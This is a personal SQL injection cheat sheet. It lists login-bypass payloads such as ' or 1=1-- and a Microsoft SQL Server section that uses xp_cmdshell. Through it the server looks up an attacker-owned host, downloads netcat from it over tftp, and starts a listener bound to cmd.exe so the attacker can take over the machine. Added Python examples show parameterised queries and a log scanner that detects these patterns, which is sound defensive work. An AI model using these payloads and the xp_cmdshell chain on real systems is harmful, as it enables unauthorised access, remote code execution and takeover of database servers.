A small reference when testing and using SQL Injection.

Note: This is for my reference, so if there is not enough detail I apologize.

Testing For SQL Injection Vulnerabilities:

We want to see whether the input is sanitized or validated; below is something you can insert into the form to check.

ba' or 1=1--

Example:
User: ba' or 1=1--
Pass: ba' or 1=1--

Query Manipulation:

SELECT * FROM table WHERE user='ba'

-TO-

SELECT * FROM table WHERE user='ba' or 1=1--

Other examples (depending on how the query was written, here are other options to try):

' or '1'='1
' or 1=1--
" or 1=1--
or 1=1--
' or '1'='1
" or "1"="1
') or ('1'='1

Note: ( -- ) is only needed for MS SQL servers. The ( -- ) tells the server to ignore the rest of the query; it can sometimes be replaced with ( # ). This makes sure your single quotes ( ' ) are in order. Also, if the field is hidden you can run the form from your local box with the injection in it.
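To see exactly why the payloads above work against one query shape and not another, here is an added example (not part of the original cheat sheet) that builds a small SQLite database in memory with a constructed users table, runs a login query built by string concatenation beside the parameterised version, and tries each payload from the list against the concatenated form. The table, the account names and passwords are all constructed for the demo.

```python
import sqlite3

# Constructed demo data; not from the original post.
USERS = [("admin", "correct-horse"), ("bob", "hunter2")]

# Payloads from the cheat sheet list above.
PAYLOADS = [
    "ba' or 1=1--",
    "' or '1'='1",
    "' or 1=1--",
    "\" or 1=1--",
    "') or ('1'='1",
]


def build_db():
    """Create an in-memory SQLite database with a two-row users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def vulnerable_login(conn, user, pw):
    """Login check built by string concatenation.

    The attacker's quote closes the literal, so the rest of the input is
    parsed as SQL: WHERE user='ba' or 1=1--' AND pass='...'
    """
    query = f"SELECT user FROM users WHERE user='{user}' AND pass='{pw}'"
    return [row[0] for row in conn.execute(query).fetchall()]


def safe_login(conn, user, pw):
    """Same check with bound parameters: the input is data, never SQL."""
    query = "SELECT user FROM users WHERE user=? AND pass=?"
    return [row[0] for row in conn.execute(query, (user, pw)).fetchall()]


def probe_payloads(conn):
    """Run every payload through the vulnerable query.

    Returns the number of rows each payload unlocks, or 'error' when the
    payload breaks the query's syntax (the wrong quote or paren shape for
    this particular query).
    """
    results = {}
    for payload in PAYLOADS:
        try:
            results[payload] = len(vulnerable_login(conn, payload, payload))
        except sqlite3.OperationalError:
            results[payload] = "error"
    return results


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", vulnerable_login(db, PAYLOADS[0], PAYLOADS[0]))
    print("safe:      ", safe_login(db, PAYLOADS[0], PAYLOADS[0]))
    for payload, outcome in probe_payloads(db).items():
        print(f"{payload!r:20} -> {outcome}")
```

The double-quoted payload returns no rows because this query wraps its values in single quotes, and the `')` payload is a syntax error because there is no opening parenthesis to close; that is the "depending on how the query was written" point from the list. The parameterised version returns nothing for every payload, which is the fix to look for in code review.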

Remote Execution on MS SQL:

Now we know the server is vulnerable. While that is nice, the above does not always let us bypass the login screen, or we may simply want to do something different. Here is an option.

Start a sniffer on a box you own:

# tcpdump udp and port 53 and host victimhostname

Now make the victim do a DNS query against your box:

'; EXEC master..xp_cmdshell 'nslookup mybox.com' --

You will see the DNS query in your tcpdump output, which means the EXEC worked. Now you can do whatever you like. For demonstration purposes, let's just upload netcat and execute it.

'; EXEC master..xp_cmdshell 'tftp -i mybox.com GET nc.exe c:\nc.exe' --

Now execute netcat so it is listening.

'; EXEC master..xp_cmdshell 'c:\nc.exe -l -p 9999 -e cmd.exe' --

Now if you know what to do the box is all yours!

Note: The ( ; ) ends the previous query and starts the next one. Also, if the ( ' ) is not working, try a ( " ).
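From the defender's side, the stacked `; EXEC master..xp_cmdshell` pattern and the tautologies above are easy to spot in a statement log. The following is an added example (not from the original post) that scans a few constructed log lines, modelled loosely on an application's SQL statement log, for the indicators this cheat sheet describes: a stacked EXEC after a semicolon, any reference to xp_cmdshell, an `or X=X` tautology, and a comment marker immediately followed by the quote the application appended. The log format and the line contents are assumptions made for the demo.

```python
import re

# Constructed sample lines (not real captures); the stmt= field holds the
# query as the application actually sent it to the database.
SAMPLE_LOG = [
    "2024-01-01T10:00:01 app=web stmt=SELECT * FROM users WHERE user='alice' AND pass='s3cret'",
    "2024-01-01T10:00:02 app=web stmt=SELECT * FROM users WHERE user='ba' or 1=1--' AND pass='x'",
    "2024-01-01T10:00:03 app=web stmt=SELECT * FROM users WHERE user=''; EXEC master..xp_cmdshell 'nslookup mybox.com' --' AND pass='x'",
    "2024-01-01T10:00:04 app=web stmt=SELECT * FROM orders WHERE note='buy 1=1 widgets'",
]

# Each indicator is a named regex; a line may trigger several.
INDICATORS = {
    # "or 1=1" / "or '1'='1": the right-hand side repeats the left-hand side
    "tautology": re.compile(r"\bor\s+('?\w+'?)\s*=\s*\1", re.IGNORECASE),
    # a semicolon terminating one statement and starting an EXEC
    "stacked_exec": re.compile(r";\s*exec\b", re.IGNORECASE),
    # the extended procedure used for command execution in the post
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.IGNORECASE),
    # comment marker followed by the quote the application appended
    "comment_trunc": re.compile(r"--\s*'"),
}


def scan(lines):
    """Return {line_index: sorted indicator names} for every flagged line.

    Lines that trigger no indicator are omitted, so an empty dict means
    nothing in the batch looked like injection.
    """
    hits = {}
    for index, line in enumerate(lines):
        names = sorted(name for name, rx in INDICATORS.items() if rx.search(line))
        if names:
            hits[index] = names
    return hits


if __name__ == "__main__":
    for index, names in scan(SAMPLE_LOG).items():
        print(f"line {index}: {', '.join(names)}")
        print("   ", SAMPLE_LOG[index])
```

Note that the last sample line contains `1=1` inside a legitimate string and is not flagged, because the tautology pattern requires the `or` in front of it; that is the kind of false positive such a check has to avoid. On the server side, the cheapest mitigation for this whole section is to leave xp_cmdshell disabled (it is off by default on modern SQL Server) and to run the application under a database login that cannot enable it.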

Conclusion: This is very basic SQL injection. Since it is just a cheat sheet I did not want this to become too long. Later I will cover other topics such as info gathering from ODBC error messages, column gathering, querying specific things, and blind SQL injection.

Other Good Docs:
http://www.securiteam.com/securityreviews/5DP0N1P76E.html
http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf